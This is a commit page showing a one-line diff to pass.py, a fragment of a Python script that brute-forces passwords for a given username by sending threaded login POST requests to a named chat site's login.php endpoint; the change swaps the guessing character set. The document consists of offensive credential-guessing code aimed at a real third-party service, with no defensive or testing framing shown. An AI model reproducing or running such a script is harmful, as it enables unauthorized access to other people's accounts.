asv7j commited on
Commit
72f1560
·
verified ·
1 Parent(s): 8033f70

Update pass.py

Browse files
Files changed (1) hide show
  1. pass.py +1 -1
pass.py CHANGED
@@ -3,7 +3,7 @@ import time
3
  from concurrent.futures import ThreadPoolExecutor, as_completed
4
 
5
  def send_login(username, number_of_attempts):
6
- charset = '24'
7
  # Function to send login request
8
  def send_request(upass):
9
  response = requests.post('https://girlschat.org/chat/system/encoded/login.php', data={
 
3
  from concurrent.futures import ThreadPoolExecutor, as_completed
4
 
5
  def send_login(username, number_of_attempts):
6
+ charset = 'asdf1234'
7
  # Function to send login request
8
  def send_request(upass):
9
  response = requests.post('https://girlschat.org/chat/system/encoded/login.php', data={